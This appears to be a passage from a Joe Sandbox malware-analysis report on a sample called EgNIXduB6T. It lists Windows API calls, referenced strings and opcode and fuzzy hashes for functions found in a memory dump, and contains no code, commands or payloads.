                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0611CB8B
                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0611CC57
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0611CC77
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0611CC81
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                      • Opcode ID: 13dc97a54c5107faea416c0a78e5329b6fd9fa618c4e04fa5f20d3be4d5aa56d
                                                                                                                                      • Instruction ID: ec063d21459d2a5bd3fc90b09d2feb584977e31c56fc35777513bbdc433046cf
                                                                                                                                      • Opcode Fuzzy Hash: 13dc97a54c5107faea416c0a78e5329b6fd9fa618c4e04fa5f20d3be4d5aa56d
                                                                                                                                      • Instruction Fuzzy Hash: A73127B5D4131CDBDF61DFA4D989BCCBBB8AF08300F1041AAE50DAB240EB759A858F44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • lstrcmpiW.KERNEL32(?,kernel32.dll,?,?,00000001,?,06195BF0,00000000), ref: 060A73E6
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrcmpi
                                                                                                                                      • String ID: LoadLibraryA$kernel32.dll
                                                                                                                                      • API String ID: 1586166983-2572683754
                                                                                                                                      • Opcode ID: d98c5ba47fbb34abf2a8b916afeb49030c5cdb78f14914407dc1305a65ce4c6f
                                                                                                                                      • Instruction ID: b57f532f99936f436843ff74fa43b6718608c4498a676bc96efec2b35a1463b4
                                                                                                                                      • Opcode Fuzzy Hash: d98c5ba47fbb34abf2a8b916afeb49030c5cdb78f14914407dc1305a65ce4c6f
                                                                                                                                      • Instruction Fuzzy Hash: E551A0B5E40209DFDB58DF98D991AAEBBB5FF88340F208119E515AB390D734AD41CFA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0612B94E
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0612B958
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0612B965
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                      • Opcode ID: a5450ca7b8658a3b0348b65505aa38c6575940650359bbfb850d039e627e4f53
                                                                                                                                      • Instruction ID: c1d5321c19ae290297319c3184a23c990dc24b1d8e9b6f8c51cb38ce661f7683
                                                                                                                                      • Opcode Fuzzy Hash: a5450ca7b8658a3b0348b65505aa38c6575940650359bbfb850d039e627e4f53
                                                                                                                                      • Instruction Fuzzy Hash: 2231D174941229EBCB61DF68DD88B8CBBB8BF48310F5045EAE81CA7250E7749F918F44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • CryptAcquireContextW.ADVAPI32(?,05F00430), ref: 0611B963
                                                                                                                                      • CryptCreateHash.ADVAPI32(?,00008002,00000000,00000000,?,?,05F00430), ref: 0611B979
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Crypt$AcquireContextCreateHash
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1914063823-0
                                                                                                                                      • Opcode ID: 2a35c1918cab1350c086f2f5ff888cbcab843df02e00d3fea4e395d0e75fff2f
                                                                                                                                      • Instruction ID: 9c017c11c21403aa3c136301f5ffa92b9a0c5df51e45d6eab242cfd32b9fd5da
                                                                                                                                      • Opcode Fuzzy Hash: 2a35c1918cab1350c086f2f5ff888cbcab843df02e00d3fea4e395d0e75fff2f
                                                                                                                                      • Instruction Fuzzy Hash: 9DE01731244342EAE3705F21EC09B41FBE5FB80B51F20842AE298AA1C0D7B0A054CB60
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0611CCB8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                      • Opcode ID: 0084aee3293bf555d7c56187c368a3a2bd238ba248434fda2aa52264926b59a4
                                                                                                                                      • Instruction ID: ea9a67be1b614ac981f7db8fc2637fe8952ad8c501394f4ca5e9a714773850fa
                                                                                                                                      • Opcode Fuzzy Hash: 0084aee3293bf555d7c56187c368a3a2bd238ba248434fda2aa52264926b59a4
                                                                                                                                      • Instruction Fuzzy Hash: C651A0B1E91615CFEB65CF95D4817AEBBF1FB48300F14853ADA01EB244D37A9A40CB90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3ed078aaba756f2c5e8cf068c1772f1dce45459f2c948fb3a98491f846ecc13b
                                                                                                                                      • Instruction ID: 969c55e634fca1169ed417cadee6fa3925026cd9e2b3c9eb8d9231ad233e40d9
                                                                                                                                      • Opcode Fuzzy Hash: 3ed078aaba756f2c5e8cf068c1772f1dce45459f2c948fb3a98491f846ecc13b
                                                                                                                                      • Instruction Fuzzy Hash: 3F125B2D04F3C03FC31346716D66DD67F699E031A871A46CBF4C19A4B3D609AA9AC7B2
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8c2849b2fd6265a7298acbce13a14ccc564bc9f5f213235e4a43def90d76ac8b
                                                                                                                                      • Instruction ID: 148ada0df147ee513e0709e31ccafa2969eda1470e57f305c54da97baec4935d
                                                                                                                                      • Opcode Fuzzy Hash: 8c2849b2fd6265a7298acbce13a14ccc564bc9f5f213235e4a43def90d76ac8b
                                                                                                                                      • Instruction Fuzzy Hash: 1312692D04F3C03FC31346756D66DD67F699E131A470A46CBF8C19A4B3D608AA9AC7B2
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Crypt$AcquireContextCreateHash
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1914063823-0
                                                                                                                                      • Opcode ID: ddc53e8812b39abc3f055fa7648558c5a9e2a9e65f1e38267ded2b75304fae77
                                                                                                                                      • Instruction ID: fee01fdcb7353b40b0a88e30bf3ecb65d155c2f7037b6567a37bc6c9eb75024c
                                                                                                                                      • Opcode Fuzzy Hash: ddc53e8812b39abc3f055fa7648558c5a9e2a9e65f1e38267ded2b75304fae77
                                                                                                                                      • Instruction Fuzzy Hash: A952F26AD297914EE3079A35C8021D6F3E8AFF7285F54D72FF84031962FB3162878A41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: bd15ee638b582ee14530fa427e98ee50685003dcf58a085d4fb317dc9662afaf
                                                                                                                                      • Instruction ID: 121fd590e8c2fd8bfe74b680f0d5a5fc80b0023b28e761f309ba4cf1df3f58de
                                                                                                                                      • Opcode Fuzzy Hash: bd15ee638b582ee14530fa427e98ee50685003dcf58a085d4fb317dc9662afaf
                                                                                                                                      • Instruction Fuzzy Hash: 9651AAB0D00209EFCB48CF99D6919AEFBB1FB49300F20C5AAD851AB350D630AB41DF94
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5f0c1cba33152d9920181df3c83920625be2028e53664481b417bc116d865a99
                                                                                                                                      • Instruction ID: cade2a4172a3eaf6b97ea73a72a988fd9d92fda2962958873ca3e045e8965ca0
                                                                                                                                      • Opcode Fuzzy Hash: 5f0c1cba33152d9920181df3c83920625be2028e53664481b417bc116d865a99
                                                                                                                                      • Instruction Fuzzy Hash: F8F03032A11324DFCB66DB49C805B5973ACEF89A52F215056E641EB251C3B1DE40C7C0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1419dd2e8ba0ba2bc6bdd2bb5da88b512cea9c1ec0c6a97727100205e4f74afc
                                                                                                                                      • Instruction ID: 8ec434ba2f8cbcdf95ee34bfe1db0f80bea105608d2dabe42f3d586318a31b29
                                                                                                                                      • Opcode Fuzzy Hash: 1419dd2e8ba0ba2bc6bdd2bb5da88b512cea9c1ec0c6a97727100205e4f74afc
                                                                                                                                      • Instruction Fuzzy Hash: 41E0BF72A51628EBC755EB998944949B3BCEB49A51F154456A611D3110C270DE00C7D1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 81135d723e4768b4e84e2b314ac118191035aac0138c7270b5af1a76c356d7aa
                                                                                                                                      • Instruction ID: af73f669e1cb08830f1bae65a2ab6af04f133939ad54272688e01894d516c682
                                                                                                                                      • Opcode Fuzzy Hash: 81135d723e4768b4e84e2b314ac118191035aac0138c7270b5af1a76c356d7aa
                                                                                                                                      • Instruction Fuzzy Hash: 2FC08C74412A9086DEA9AA1086B07A8336AA7C1682FD00C8CC5070B6A1DB5E9887D640
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 0611FFA7
                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0611FFAF
                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 06120038
                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 06120063
                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 061200B8
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                      • String ID: csm
                                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                                      • Opcode ID: bab96d381d71214503c4739a7e83e3498c656de212227f302f9504104882587f
                                                                                                                                      • Instruction ID: 1a72e5dba15370da8b20649f8c9433328e95a74a7e05fc214ac0f3c5807bbf88
                                                                                                                                      • Opcode Fuzzy Hash: bab96d381d71214503c4739a7e83e3498c656de212227f302f9504104882587f
                                                                                                                                      • Instruction Fuzzy Hash: 58512734E0022A9FDF50DF78C8406AA77F5EF49369F048265ED18EB291E735DAA1C790
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,0614006F,05F38A2D,?,?,00000000,?,?,061402D9,00000021,FlsSetValue,0616D620,0616D628,?), ref: 06140023
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                      • API String ID: 3664257935-537541572
                                                                                                                                      • Opcode ID: 546e6b9ac247f2f8383af183780fd99afa9d88d38643e24e06aacbf85a5db626
                                                                                                                                      • Instruction ID: 719fb0bfb484d984fdf8f9ccbc74d18bc396745377d804b680791bfb6612f5a1
                                                                                                                                      • Opcode Fuzzy Hash: 546e6b9ac247f2f8383af183780fd99afa9d88d38643e24e06aacbf85a5db626
                                                                                                                                      • Instruction Fuzzy Hash: DD21E732E00324AFD7A1AF25EC40A5A7B5A9F457E5F150124FE57E7280E730ED01C6D0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetLastError.KERNEL32(00000001,?,061201A2,0611BC51,0611BF34,?,0611C16C,?,00000001,?,?,00000001,?,0619F8F0,0000000C,0611C265), ref: 061269F2
                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 06126A00
                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 06126A19
                                                                                                                                      • SetLastError.KERNEL32(00000000,0611C16C,?,00000001,?,?,00000001,?,0619F8F0,0000000C,0611C265,?,00000001,?), ref: 06126A6B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                      • Opcode ID: b1988b2f2fec6e72ab46dbd7bed2b95f2eab0b72c6a8dcd3a6235d3cb0e033f7
                                                                                                                                      • Instruction ID: a01c3330a3cc664c27fa8536b292ac7c1a21ecae2d1de3fa02857ffd7ecf19a0
                                                                                                                                      • Opcode Fuzzy Hash: b1988b2f2fec6e72ab46dbd7bed2b95f2eab0b72c6a8dcd3a6235d3cb0e033f7
                                                                                                                                      • Instruction Fuzzy Hash: 8701F73751D3335FABD427747C8553B2A9ADB81675B254629F734410E0EF624DF182C0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,FFC4B191,?,?,00000000,06150F66,000000FF,?,061395D2,?,?,061395A6,00000016), ref: 06139677
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 06139689
                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,06150F66,000000FF,?,061395D2,?,?,061395A6,00000016), ref: 061396AB
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                      • Opcode ID: c24a7c79fe1b7e969f733700594b2edee47a3f9a7f6caab6d018ef2d5cadd40a
                                                                                                                                      • Instruction ID: 01c811b8c737d287eaaca8150d2b2e772fb8aff9024d801744c0103e81311b2c
                                                                                                                                      • Opcode Fuzzy Hash: c24a7c79fe1b7e969f733700594b2edee47a3f9a7f6caab6d018ef2d5cadd40a
                                                                                                                                      • Instruction Fuzzy Hash: B001A271A40769EFDB119B51CC05BAEFBB9FB04B51F000525F922E2280EBB99950CA90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 060AB4DF
                                                                                                                                        • Part of subcall function 0611DBB4: RaiseException.KERNEL32(E06D7363,00000001,00000003,060AB4D2,?,00000000,?,?,060AB4D2,?,0619E5B4,?,?,060A538D,?,060A5312), ref: 0611DC14
                                                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 060AB4FF
                                                                                                                                      • std::regex_error::regex_error.LIBCPMT ref: 060AB51F
                                                                                                                                        • Part of subcall function 06011670: ___std_exception_copy.LIBVCRUNTIME ref: 06011698
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: std::invalid_argument::invalid_argument$ExceptionRaise___std_exception_copystd::regex_error::regex_error
                                                                                                                                      • String ID: bad function call
                                                                                                                                      • API String ID: 2176578266-3612616537
                                                                                                                                      • Opcode ID: 21281e290b27689b015b176d5d02741e6f594aadf5310c6a50b0d9d94767532e
                                                                                                                                      • Instruction ID: 0d0c7f654f5a58cc118551d7151569cb807d80ce842dff3570fdc82b50511baf
                                                                                                                                      • Opcode Fuzzy Hash: 21281e290b27689b015b176d5d02741e6f594aadf5310c6a50b0d9d94767532e
                                                                                                                                      • Instruction Fuzzy Hash: 5301FB39C4020CB7CF84FAE4EC46CDDBB7DAE04640F808464EA3196455EBB5E6198BE5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,06127ADD,00000000,?,00000001,?,?,?,06127BCC,00000001,FlsFree,0616A918,0616A920), ref: 06127B39
                                                                                                                                      • GetLastError.KERNEL32(?,06127ADD,00000000,?,00000001,?,?,?,06127BCC,00000001,FlsFree,0616A918,0616A920,00000000,?,06126AF0), ref: 06127B43
                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 06127B6B
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                      • String ID: api-ms-
                                                                                                                                      • API String ID: 3177248105-2084034818
                                                                                                                                      • Opcode ID: 669765a24cd8e78fc7dab25e420ff5c297a5f4cc293731f8fe63249f547f3955
                                                                                                                                      • Instruction ID: 8b74e17e6ed81fad7927349b8b2409c0fd760baf8475721e56047b1cfb5b4e8a
                                                                                                                                      • Opcode Fuzzy Hash: 669765a24cd8e78fc7dab25e420ff5c297a5f4cc293731f8fe63249f547f3955
                                                                                                                                      • Instruction Fuzzy Hash: 68E048316C0315F7DB911E71EC05F59BF569F00B90F144020FA1DA90D1EB71D5A0D545
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetConsoleOutputCP.KERNEL32(FFC4B191,?,00000000,?), ref: 0613B928
                                                                                                                                        • Part of subcall function 0614541B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,06143859,?,00000000,-00000008), ref: 061454C7
                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0613BB83
                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0613BBCB
                                                                                                                                      • GetLastError.KERNEL32 ref: 0613BC6E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2112829910-0
                                                                                                                                      • Opcode ID: 3547f09d443cfb4b378985dd0bfab45ad616bb26f691b0547cfa9ca6397bbfa9
                                                                                                                                      • Instruction ID: 74e6e509b163f1b63747c7dec5bad67482d85d503db89356aaa35023ca34c8de
                                                                                                                                      • Opcode Fuzzy Hash: 3547f09d443cfb4b378985dd0bfab45ad616bb26f691b0547cfa9ca6397bbfa9
                                                                                                                                      • Instruction Fuzzy Hash: 40D17DB5D04268DFCF55CFA8D8809ADBBB5FF58310F18852AE866EB351E730A941CB50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,06147F5E,?,00000001,?,?,?,0613BCC2,?,?,00000000), ref: 0614BD4A
                                                                                                                                      • GetLastError.KERNEL32(?,06147F5E,?,00000001,?,?,?,0613BCC2,?,?,00000000,?,?,?,0613C280,?), ref: 0614BD56
                                                                                                                                        • Part of subcall function 0614BD1C: CloseHandle.KERNEL32(FFFFFFFE,0614BD66,?,06147F5E,?,00000001,?,?,?,0613BCC2,?,?,00000000,?,?), ref: 0614BD2C
                                                                                                                                      • ___initconout.LIBCMT ref: 0614BD66
                                                                                                                                        • Part of subcall function 0614BCDE: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0614BD0D,06147F4B,?,?,0613BCC2,?,?,00000000,?), ref: 0614BCF1
                                                                                                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,06147F5E,?,00000001,?,?,?,0613BCC2,?,?,00000000,?), ref: 0614BD7B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
